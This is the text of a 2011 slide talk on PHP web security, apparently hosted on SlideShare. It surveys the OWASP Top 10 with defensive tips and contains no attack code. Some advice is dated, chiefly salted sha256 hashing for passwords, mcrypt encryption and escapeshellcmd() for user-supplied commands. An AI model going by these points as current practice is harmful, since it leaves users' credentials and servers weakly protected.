SlideShare une entreprise Scribd logo

PHP Security Tips

Télécharger en tant que PPTX, PDF
Chris Tankersley
Chris Tankersley
Technologie
1  sur  51
PHP Security E-mail: chris@ctankersley.com Twitter: @dragonmantank Identi.ca: dragonmantank September 20, 2011 NWO-PUG 1
Who are you and why are you in my house? Chris Tankersley Doing PHP for 8 Years Lots of projects no one uses, and a few that some do TL;DR https://github.com/dragonmantank NWO-PUG 2 September 20, 2011
The Parts of Security It’s more than just a username/password NWO-PUG 3 September 20, 2011
What is Secure Programming? Minimizing Attack Surface Establishing Secure Defaults Principle of Least Privilege Defense in Depth Fail Securely Don’t Trust Services or Users Separation of Duties Avoid Security through Obscurity Keep Security Simple Fix Security Issues Correctly September 20, 2011 NWO-PUG 4 https://www.owasp.org/index.php/Secure_Coding_Principles
Most Common Attacks And how to avoid them NWO-PUG 5 September 20, 2011
OWASP Top 10 Injection Cross-Site Scripting Broken Authentication and Session Management Insecure Direct Object References Cross-Site Request Forgery Security Misconfiguration Insecure Cryptographic Storage Failure To Restrict URL Access Insufficient Transport Layer Protection Unvalidated Redirects and Forwards NWO-PUG 6 https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project September 20, 2011
Injection NWO-PUG 7 September 20, 2011
What is Injection? When a user or service corrupts a command due to improper validation of input September 20, 2011 NWO-PUG 8
Many Shapes and Sizes SQL Injection Command Injection HTML Injection September 20, 2011 NWO-PUG 9
Protecting against Injections Attacks Filter user input Escape anything not hard-coded Ignore $_REQUEST NWO-PUG 10 September 20, 2011
SQL Injection NWO-PUG 11 September 20, 2011
A Bit More Real Life NWO-PUG 12 September 20, 2011
Protecting against SQL Injection Use PDO and prepared statements NWO-PUG 13 September 20, 2011
Command Injection When your script calls an external program, users can run code NWO-PUG 14 September 20, 2011
Protecting against Command Injection If allowing the user to specify commands, use escapeshellcmd() If allowing the user to specify arguments, use escapeshellarg() NWO-PUG 15 September 20, 2011
HTML/Script Injection HTML Injection: When user input is used to create new markup that the application did not expect Script Injection: When user input is used to add new scripting to a page NWO-PUG 16 September 20, 2011
HTML/Script Injection NWO-PUG 17 September 20, 2011
Protecting against HTML/Script Injection Decide if you really need to take HTML input If you do: Use an HTML cleaner like Tidy or htmLawed Create a whitelist of allowed tags If you don’t: Use htmlentities()/htmlspecialchars() NWO-PUG 18 September 20, 2011
Cross Site Scripting Or XSS NWO-PUG 19 September 20, 2011
What is it? When a user injects a script into a page or extra JS into a command to send information to another site September 20, 2011 NWO-PUG 20
How to avoid XSS? Since this is an injection attack, use the same steps as a HTML/Script injection NWO-PUG 21 September 20, 2011
Broken Authentication and Session Management NWO-PUG 22 September 20, 2011
What is it? Insecure storing of credentials Session IDs exposed via URL Session fixation attacks September 20, 2011 NWO-PUG 23
Storing Credentials Hash with a salt using the hash() command Do not use md5 or sha1, use at least sha256 md5 and sha1 are broken and not recommended for secure hashing If you have to use the raw data, encrypt using mcrypt() Use AES256 (RIJNDAEL 256) NWO-PUG 24 September 20, 2011
Session IDs in URL Commonly used when cookies can’t be enabled Make sure the following is set in your php.ini: session.use_trans_id = 0 session.use_only_cookies = 1 NWO-PUG 25 September 20, 2011
Session Fixation What happens if your users don’t log out? Use sessions to detect login status NWO-PUG 26 September 20, 2011
Insecure Direct Object References NWO-PUG 27 September 20, 2011
What is it? Making sure that what the user is accessing they have access to. Should be handled by checking authorization when accessed, or mapping This is not an injection attack, but a logic attack September 20, 2011 NWO-PUG 28
An Example NWO-PUG 29 September 20, 2011
How to Avoid Always check to make sure the user has authorization to access the resource Map variables/whitelist to make it harder NWO-PUG 30 September 20, 2011
Cross Site Request Forgery Or CSRF Attacks NWO-PUG 31 September 20, 2011
What is it? When unauthorized commands are sent to and from a trusted website In days gone by, this would be done with Referral checking, but don’t trust referrer information September 20, 2011 NWO-PUG 32
An example – Bank Transfer A bank transfer is done via $_GET variables User is authenticated but not logged out NWO-PUG 33 September 20, 2011
How to avoid this Include a hidden element in the form with a one-time value NWO-PUG 34 September 20, 2011
Security Misconfiguration NWO-PUG 35 September 20, 2011
Beyond the scope of programming Check for server hardening guidelines for your OS Password rotation practices Understanding your settings Keep your stack up to date! September 20, 2011 NWO-PUG 36
Insecure Cryptographic Storage NWO-PUG 37 September 20, 2011
More of a logic problem Encrypting data in the database, but leaving it unencrypted during output Using unsalted hashes September 20, 2011 NWO-PUG 38
How to avoid this Like when storing credentials, use a salt whenever hashing information Only decrypt data when it is needed NWO-PUG 39 September 20, 2011
Failure to Restrict URL Access NWO-PUG 40 September 20, 2011
What is it? When users can gain access to parts of the application just through URL manipulation When the app doesn’t check authorization properly September 20, 2011 NWO-PUG 41
Security through Obscurity Don’t trust that just because a user doesn’t know a URL, they can’t get to it Fuzzers can find all kinds of things, especially if the app is common NWO-PUG 42 September 20, 2011
How to avoid this ALWAYS check authorization. The extra CPU cycles are worth it. NWO-PUG 43 September 20, 2011
Insufficient Transport Layer Protection NWO-PUG 44 September 20, 2011
Not using SSL when you should If your data is sensitive, use SSL Are your logins behind SSL? There isn’t really an excuse. You can get an SSL cert for $9/year. September 20, 2011 NWO-PUG 45
Unvalidated Redirects and Forwards NWO-PUG 46 September 20, 2011
What is it? When an app doesn’t properly validate that the redirect destination is valid September 20, 2011 NWO-PUG 47
Putting it Together NWO-PUG 48 September 20, 2011
Attacking from Multiple Fronts Attackers will employ many different vectors in an attack HTML injection can take advantage of a Broken Auth system and use XSS or URL restrictions to force users to do unintended actions Script injection can lead to Session hijacking September 20, 2011 NWO-PUG 49
Remember… Minimizing Attack Surface Establishing Secure Defaults Principle of Least Privilege Defense in Depth Fail Securely Don’t Trust Services or Users Separation of Duties Avoid Security through Obscurity Keep Security Simple Fix Security Issues Correctly September 20, 2011 NWO-PUG 50 https://www.owasp.org/index.php/Secure_Coding_Principles
Questions? September 20, 2011 NWO-PUG 51

Recommandé

Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 
Security In .Net Framework
Security In .Net FrameworkSecurity In .Net Framework
Security In .Net FrameworkRamakanta Behera
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP CodingNarudom Roongsiriwong, CISSP
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 

Recommandé

Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 
Security In .Net Framework
Security In .Net FrameworkSecurity In .Net Framework
Security In .Net FrameworkRamakanta Behera
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP CodingNarudom Roongsiriwong, CISSP
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security TopicsShawn Gorrell
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
S8-Session Managment
S8-Session ManagmentS8-Session Managment
S8-Session Managmentzakieh alizadeh
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Analysis of web application penetration testing
Analysis of web application penetration testingAnalysis of web application penetration testing
Analysis of web application penetration testingEngr Md Yusuf Miah
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Secure Web Applications Ver0.01
Secure Web Applications Ver0.01Secure Web Applications Ver0.01
Secure Web Applications Ver0.01Vasan Ramadoss
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesMindfire Solutions
 
XSS
XSSXSS
XSSHrishikesh Mishra
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10InnoTech
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack PresentationKhoa Nguyen
 
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Dakiry
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideLudovic Petit
 
Web Security Attacks
Web Security AttacksWeb Security Attacks
Web Security AttacksSajid Hasan
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservicesMohammed A. Imran
 
Secure Code Warrior - Local storage
Secure Code Warrior - Local storageSecure Code Warrior - Local storage
Secure Code Warrior - Local storageSecure Code Warrior
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Il lavoro delle donne nel settore turismo
Il lavoro delle donne nel settore turismoIl lavoro delle donne nel settore turismo
Il lavoro delle donne nel settore turismoFormazioneTurismo
 
Gimnazjum Szesciokolowe
Gimnazjum SzesciokoloweGimnazjum Szesciokolowe
Gimnazjum Szesciokoloweguest86d246
 

Contenu connexe

Tendances

.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security TopicsShawn Gorrell
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Analysis of web application penetration testing
Analysis of web application penetration testingAnalysis of web application penetration testing
Analysis of web application penetration testingEngr Md Yusuf Miah
 
Secure Web Applications Ver0.01
Secure Web Applications Ver0.01Secure Web Applications Ver0.01
Secure Web Applications Ver0.01Vasan Ramadoss
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesMindfire Solutions
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10InnoTech
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack PresentationKhoa Nguyen
 
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Dakiry
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideLudovic Petit
 
Web Security Attacks
Web Security AttacksWeb Security Attacks
Web Security AttacksSajid Hasan
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservicesMohammed A. Imran
 
Secure Code Warrior - Local storage
Secure Code Warrior - Local storageSecure Code Warrior - Local storage
Secure Code Warrior - Local storageSecure Code Warrior
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 

Tendances (20)

.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security Topics
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
 
S8-Session Managment
S8-Session ManagmentS8-Session Managment
S8-Session Managment
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Analysis of web application penetration testing
Analysis of web application penetration testingAnalysis of web application penetration testing
Analysis of web application penetration testing
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Secure Web Applications Ver0.01
Secure Web Applications Ver0.01Secure Web Applications Ver0.01
Secure Web Applications Ver0.01
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection Vulnerabilities
 
XSS
XSSXSS
XSS
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack Presentation
 
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference Guide
 
Web Security Attacks
Web Security AttacksWeb Security Attacks
Web Security Attacks
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservices
 
Secure Code Warrior - Local storage
Secure Code Warrior - Local storageSecure Code Warrior - Local storage
Secure Code Warrior - Local storage
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 

En vedette

Il lavoro delle donne nel settore turismo
Il lavoro delle donne nel settore turismoIl lavoro delle donne nel settore turismo
Il lavoro delle donne nel settore turismoFormazioneTurismo
 
Gimnazjum Szesciokolowe
Gimnazjum SzesciokoloweGimnazjum Szesciokolowe
Gimnazjum Szesciokoloweguest86d246
 
Tag You’re it! Creating Cross Curricular Teams from Scratch
Tag You’re it! Creating Cross Curricular Teams from ScratchTag You’re it! Creating Cross Curricular Teams from Scratch
Tag You’re it! Creating Cross Curricular Teams from Scratchccpc
 
Faktor penentangan musyrikin quraisy terhadap dakwah rasulullah saw
Faktor penentangan musyrikin quraisy terhadap dakwah rasulullah sawFaktor penentangan musyrikin quraisy terhadap dakwah rasulullah saw
Faktor penentangan musyrikin quraisy terhadap dakwah rasulullah sawcba0004
 
Indo Japan Trade & Investment Bulletine - January-2013
Indo Japan Trade & Investment Bulletine - January-2013Indo Japan Trade & Investment Bulletine - January-2013
Indo Japan Trade & Investment Bulletine - January-2013Corporate Professionals
 
отличницы
отличницыотличницы
отличницыPereznatnova
 
sGen Club 4thExhibition SmartRetail Cardtumbler
sGen Club 4thExhibition SmartRetail CardtumblersGen Club 4thExhibition SmartRetail Cardtumbler
sGen Club 4thExhibition SmartRetail CardtumblerSe Ran Kim
 
Bach duet 802
Bach duet 802Bach duet 802
Bach duet 802joansoco
 
Suresh p resume c4 latest
Suresh p resume c4 latestSuresh p resume c4 latest
Suresh p resume c4 latestsuresh kumar
 
αθλητικα ποδοσφαιρο
αθλητικα ποδοσφαιροαθλητικα ποδοσφαιρο
αθλητικα ποδοσφαιροBasilis Drosos
 
Evaluation Question 2
Evaluation Question 2Evaluation Question 2
Evaluation Question 2oliviagodd
 

En vedette (20)

Il lavoro delle donne nel settore turismo
Il lavoro delle donne nel settore turismoIl lavoro delle donne nel settore turismo
Il lavoro delle donne nel settore turismo
 
Gimnazjum Szesciokolowe
Gimnazjum SzesciokoloweGimnazjum Szesciokolowe
Gimnazjum Szesciokolowe
 
SchoolTripRA
SchoolTripRASchoolTripRA
SchoolTripRA
 
Tag You’re it! Creating Cross Curricular Teams from Scratch
Tag You’re it! Creating Cross Curricular Teams from ScratchTag You’re it! Creating Cross Curricular Teams from Scratch
Tag You’re it! Creating Cross Curricular Teams from Scratch
 
Bankomat
BankomatBankomat
Bankomat
 
Faktor penentangan musyrikin quraisy terhadap dakwah rasulullah saw
Faktor penentangan musyrikin quraisy terhadap dakwah rasulullah sawFaktor penentangan musyrikin quraisy terhadap dakwah rasulullah saw
Faktor penentangan musyrikin quraisy terhadap dakwah rasulullah saw
 
Rq
RqRq
Rq
 
Indo Japan Trade & Investment Bulletine - January-2013
Indo Japan Trade & Investment Bulletine - January-2013Indo Japan Trade & Investment Bulletine - January-2013
Indo Japan Trade & Investment Bulletine - January-2013
 
Prezentare Soft Expert
Prezentare Soft ExpertPrezentare Soft Expert
Prezentare Soft Expert
 
отличницы
отличницыотличницы
отличницы
 
sGen Club 4thExhibition SmartRetail Cardtumbler
sGen Club 4thExhibition SmartRetail CardtumblersGen Club 4thExhibition SmartRetail Cardtumbler
sGen Club 4thExhibition SmartRetail Cardtumbler
 
Playrlic
PlayrlicPlayrlic
Playrlic
 
Bach duet 802
Bach duet 802Bach duet 802
Bach duet 802
 
Diapositiva 3
Diapositiva 3Diapositiva 3
Diapositiva 3
 
Suresh p resume c4 latest
Suresh p resume c4 latestSuresh p resume c4 latest
Suresh p resume c4 latest
 
Evaluation
EvaluationEvaluation
Evaluation
 
Lingkaran
LingkaranLingkaran
Lingkaran
 
αθλητικα ποδοσφαιρο
αθλητικα ποδοσφαιροαθλητικα ποδοσφαιρο
αθλητικα ποδοσφαιρο
 
Evaluation Question 2
Evaluation Question 2Evaluation Question 2
Evaluation Question 2
 
Métodos anticonceptivos
Métodos anticonceptivosMétodos anticonceptivos
Métodos anticonceptivos
 

Similaire à PHP Security Tips

OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
API Security Best Practices and Guidelines
API Security Best Practices and GuidelinesAPI Security Best Practices and Guidelines
API Security Best Practices and GuidelinesWSO2
 
Phishing Seminar By M Nadeem Qazi(MnQazi) pptx
Phishing Seminar By M Nadeem Qazi(MnQazi) pptxPhishing Seminar By M Nadeem Qazi(MnQazi) pptx
Phishing Seminar By M Nadeem Qazi(MnQazi) pptxM Nadeem Qazi
 
Building Secure Apps in the Cloud
Building Secure Apps in the CloudBuilding Secure Apps in the Cloud
Building Secure Apps in the CloudAtlassian
 
Owasp Top 10 Vulnerabilities List
Owasp Top 10 Vulnerabilities ListOwasp Top 10 Vulnerabilities List
Owasp Top 10 Vulnerabilities ListVamsi K
 
Web API Security
Web API SecurityWeb API Security
Web API SecurityStefaan
 
Peeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityPeeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityMatt Tesauro
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Wail Hassan
 
OWASP: Building Secure Web Apps
OWASP: Building Secure Web AppsOWASP: Building Secure Web Apps
OWASP: Building Secure Web Appsmlogvinov
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL InjectionJoe McCray
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
OAuth - Don’t Throw the Baby Out with the Bathwater
OAuth - Don’t Throw the Baby Out with the Bathwater OAuth - Don’t Throw the Baby Out with the Bathwater
OAuth - Don’t Throw the Baby Out with the Bathwater Apigee | Google Cloud
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptxAnkit Giri
 
Reverse Engineering .NET and Java
Reverse Engineering .NET and JavaReverse Engineering .NET and Java
Reverse Engineering .NET and JavaJoe Kuemerle
 
Developing Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common AttacksDeveloping Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common AttacksPayPalX Developer Network
 
Web 20 Security - Vordel
Web 20 Security - VordelWeb 20 Security - Vordel
Web 20 Security - Vordelguest2a1135
 
Security For Application Development
Security For Application DevelopmentSecurity For Application Development
Security For Application Development6502programmer
 
Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...Netsparker
 

Similaire à PHP Security Tips (20)

The Security Code Review Guide
The Security Code Review GuideThe Security Code Review Guide
The Security Code Review Guide
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
 
API Security Best Practices and Guidelines
API Security Best Practices and GuidelinesAPI Security Best Practices and Guidelines
API Security Best Practices and Guidelines
 
Phishing Seminar By M Nadeem Qazi(MnQazi) pptx
Phishing Seminar By M Nadeem Qazi(MnQazi) pptxPhishing Seminar By M Nadeem Qazi(MnQazi) pptx
Phishing Seminar By M Nadeem Qazi(MnQazi) pptx
 
Building Secure Apps in the Cloud
Building Secure Apps in the CloudBuilding Secure Apps in the Cloud
Building Secure Apps in the Cloud
 
Owasp Top 10 Vulnerabilities List
Owasp Top 10 Vulnerabilities ListOwasp Top 10 Vulnerabilities List
Owasp Top 10 Vulnerabilities List
 
Web API Security
Web API SecurityWeb API Security
Web API Security
 
Peeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityPeeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API Security
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)
 
OWASP: Building Secure Web Apps
OWASP: Building Secure Web AppsOWASP: Building Secure Web Apps
OWASP: Building Secure Web Apps
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Webhooks
WebhooksWebhooks
Webhooks
 
OAuth - Don’t Throw the Baby Out with the Bathwater
OAuth - Don’t Throw the Baby Out with the Bathwater OAuth - Don’t Throw the Baby Out with the Bathwater
OAuth - Don’t Throw the Baby Out with the Bathwater
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptx
 
Reverse Engineering .NET and Java
Reverse Engineering .NET and JavaReverse Engineering .NET and Java
Reverse Engineering .NET and Java
 
Developing Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common AttacksDeveloping Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common Attacks
 
Web 20 Security - Vordel
Web 20 Security - VordelWeb 20 Security - Vordel
Web 20 Security - Vordel
 
Security For Application Development
Security For Application DevelopmentSecurity For Application Development
Security For Application Development
 
Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...Web Application Penetration Tests - Vulnerability Identification and Details ...
Web Application Penetration Tests - Vulnerability Identification and Details ...
 

Plus de Chris Tankersley

Docker is Dead: Long Live Containers
Docker is Dead: Long Live ContainersDocker is Dead: Long Live Containers
Docker is Dead: Long Live ContainersChris Tankersley
 
Bend time to your will with git
Bend time to your will with gitBend time to your will with git
Bend time to your will with gitChris Tankersley
 
Using PHP Functions! (Not those functions, Google Cloud Functions)
Using PHP Functions! (Not those functions, Google Cloud Functions)Using PHP Functions! (Not those functions, Google Cloud Functions)
Using PHP Functions! (Not those functions, Google Cloud Functions)Chris Tankersley
 
Dead Simple APIs with OpenAPI
Dead Simple APIs with OpenAPIDead Simple APIs with OpenAPI
Dead Simple APIs with OpenAPIChris Tankersley
 
Killer Docker Workflows for Development
Killer Docker Workflows for DevelopmentKiller Docker Workflows for Development
Killer Docker Workflows for DevelopmentChris Tankersley
 
Docker for Developers - PHP Detroit 2018
Docker for Developers - PHP Detroit 2018Docker for Developers - PHP Detroit 2018
Docker for Developers - PHP Detroit 2018Chris Tankersley
 
BASHing at the CLI - Midwest PHP 2018
BASHing at the CLI - Midwest PHP 2018BASHing at the CLI - Midwest PHP 2018
BASHing at the CLI - Midwest PHP 2018Chris Tankersley
 
You Were Lied To About Optimization
You Were Lied To About OptimizationYou Were Lied To About Optimization
You Were Lied To About OptimizationChris Tankersley
 
Docker for PHP Developers - php[world] 2017
Docker for PHP Developers - php[world] 2017Docker for PHP Developers - php[world] 2017
Docker for PHP Developers - php[world] 2017Chris Tankersley
 
Docker for PHP Developers - Madison PHP 2017
Docker for PHP Developers - Madison PHP 2017Docker for PHP Developers - Madison PHP 2017
Docker for PHP Developers - Madison PHP 2017Chris Tankersley
 
Docker for Developers - php[tek] 2017
Docker for Developers - php[tek] 2017Docker for Developers - php[tek] 2017
Docker for Developers - php[tek] 2017Chris Tankersley
 
Why Docker? Dayton PHP, April 2017
Why Docker? Dayton PHP, April 2017Why Docker? Dayton PHP, April 2017
Why Docker? Dayton PHP, April 2017Chris Tankersley
 
OOP Is More Then Cars and Dogs - Midwest PHP 2017
OOP Is More Then Cars and Dogs - Midwest PHP 2017OOP Is More Then Cars and Dogs - Midwest PHP 2017
OOP Is More Then Cars and Dogs - Midwest PHP 2017Chris Tankersley
 
From Docker to Production - SunshinePHP 2017
From Docker to Production - SunshinePHP 2017From Docker to Production - SunshinePHP 2017
From Docker to Production - SunshinePHP 2017Chris Tankersley
 
Docker for Developers - Sunshine PHP
Docker for Developers - Sunshine PHPDocker for Developers - Sunshine PHP
Docker for Developers - Sunshine PHPChris Tankersley
 
Coming to Terms with OOP In Drupal - php[world] 2016
Coming to Terms with OOP In Drupal - php[world] 2016Coming to Terms with OOP In Drupal - php[world] 2016
Coming to Terms with OOP In Drupal - php[world] 2016Chris Tankersley
 
How We Got Here: A Brief History of Open Source
How We Got Here: A Brief History of Open SourceHow We Got Here: A Brief History of Open Source
How We Got Here: A Brief History of Open SourceChris Tankersley
 

Plus de Chris Tankersley (20)

Docker is Dead: Long Live Containers
Docker is Dead: Long Live ContainersDocker is Dead: Long Live Containers
Docker is Dead: Long Live Containers
 
Bend time to your will with git
Bend time to your will with gitBend time to your will with git
Bend time to your will with git
 
Using PHP Functions! (Not those functions, Google Cloud Functions)
Using PHP Functions! (Not those functions, Google Cloud Functions)Using PHP Functions! (Not those functions, Google Cloud Functions)
Using PHP Functions! (Not those functions, Google Cloud Functions)
 
Dead Simple APIs with OpenAPI
Dead Simple APIs with OpenAPIDead Simple APIs with OpenAPI
Dead Simple APIs with OpenAPI
 
Killer Docker Workflows for Development
Killer Docker Workflows for DevelopmentKiller Docker Workflows for Development
Killer Docker Workflows for Development
 
You Got Async in my PHP!
You Got Async in my PHP!You Got Async in my PHP!
You Got Async in my PHP!
 
Docker for Developers - PHP Detroit 2018
Docker for Developers - PHP Detroit 2018Docker for Developers - PHP Detroit 2018
Docker for Developers - PHP Detroit 2018
 
Docker for Developers
Docker for DevelopersDocker for Developers
Docker for Developers
 
They are Watching You
They are Watching YouThey are Watching You
They are Watching You
 
BASHing at the CLI - Midwest PHP 2018
BASHing at the CLI - Midwest PHP 2018BASHing at the CLI - Midwest PHP 2018
BASHing at the CLI - Midwest PHP 2018
 
You Were Lied To About Optimization
You Were Lied To About OptimizationYou Were Lied To About Optimization
You Were Lied To About Optimization
 
Docker for PHP Developers - php[world] 2017
Docker for PHP Developers - php[world] 2017Docker for PHP Developers - php[world] 2017
Docker for PHP Developers - php[world] 2017
 
Docker for PHP Developers - Madison PHP 2017
